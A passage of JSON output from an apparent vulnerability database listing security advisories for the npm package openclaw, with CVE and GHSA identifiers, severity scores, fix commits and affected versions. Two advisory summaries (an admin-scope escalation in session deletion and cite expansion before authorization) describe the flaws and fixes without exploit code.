bbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-utv2-tyje-kfht"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vv2u-u7mn-rfe1"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"}],"aliases":["CVE-2026-35667","GHSA-3298-56p6-rpw2"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-cvxu-rdbu-abd2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91353?format=json","vulnerability_id":"VCID-cwd3-ecym-sfaw","summary":"OpenClaw: Gateway Plugin Subagent Fallback `deleteSession` Uses Synthetic `operator.admin`\n## Summary\n\nGateway Plugin Subagent Fallback `deleteSession` Uses Synthetic `operator.admin`\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nGateway plugin subagent fallback `deleteSession` previously dispatched `sessions.delete` with a synthetic `operator.admin` runtime scope when no request-scoped client existed. Commit `b5d785f1a59a56c3471f2cef328f7c9a6c15f3e7` binds deletion to the caller scope instead of minting admin scope.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `b5d785f1a59a56c3471f2cef328f7c9a6c15f3e7`.\n\n## Fix Commit(s)\n\n- `b5d785f1a59a56c3471f2cef328f7c9a6c15f3e7`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35645","reference_id":"","reference_type":"","scores":[{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.15986","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.1603","published_at":"2026-06-06T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.1604","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35645"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/b5d785f1a59a56c3471f2cef328f7c9a6c15f3e7","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:11:49Z/"}],"url":"https://github.com/openclaw/openclaw/commit/b5d785f1a59a56c3471f2cef328f7c9a6c15f3e7"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-h4jx-hjr3-fhgc","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:11:49Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-h4jx-hjr3-fhgc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35645","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35645"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-synthetic-operator-admin-in-deletesession","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:11:49Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-synthetic-operator-admin-in-deletesession"},{"reference_url":"https://github.com/advisories/GHSA-h4jx-hjr3-fhgc","reference_id":"GHSA-h4jx-hjr3-fhgc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h4jx-hjr3-fhgc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-35645","GHSA-h4jx-hjr3-fhgc"],"risk_score":3.6,"exploitability":"0.5","weighted_severity":"7.3","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-cwd3-ecym-sfaw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90977?format=json","vulnerability_id":"VCID-cyj6-zyuh-qug6","summary":"OpenClaw: Tlon cite expansion happens before channel and DM authorization is complete\n## Summary\nTlon cite expansion happened before channel and DM authorization completed, allowing cite work and content handling before the final auth decision.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `3cbf932413e41d1836cb91aed1541a28a3122f93`\n- `ebee4e2210e1f282a982c7ef2ad79d77a572fc87`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/tlon/src/monitor/index.ts now defers cite expansion until after authorization and preserves explicit empty-allowlist semantics.\n- extensions/tlon/src/monitor/utils.ts and extensions/tlon/src/security.test.ts ship the deferred cite expansion behavior and regressions.\n\nOpenClaw thanks @zpbrent for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35637","reference_id":"","reference_type":"","scores":[{"value":"0.00057","scoring_system":"epss","scoring_elements":"0.1803","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00057","scoring_system":"epss","scoring_elements":"0.17991","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00057","scoring_system":"epss","scoring_elements":"0.18028","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35637"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/3cbf932413e41d1836cb91aed1541a28a3122f93","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:13:08Z/"}],"url":"https://github.com/openclaw/openclaw/commit/3cbf932413e41d1836cb91aed1541a28a3122f93"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:13:08Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/ebee4e2210e1f282a982c7ef2ad79d77a572fc87","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:13:08Z/"}],"url":"https://github.com/openclaw/openclaw/commit/ebee4e2210e1f282a982c7ef2ad79d77a572fc87"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vfg3-pqpq-93m4","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:13:08Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vfg3-pqpq-93m4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35637","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35637"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-premature-cite-expansion-before-authorization-in-channel-and-dm","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:13:08Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-premature-cite-expansion-before-authorization-in-channel-and-dm"},{"reference_url":"https://github.com/advisories/GHSA-vfg3-pqpq-93m4","reference_id":"GHSA-vfg3-pqpq-93m4","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vfg3-pqpq-93m4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz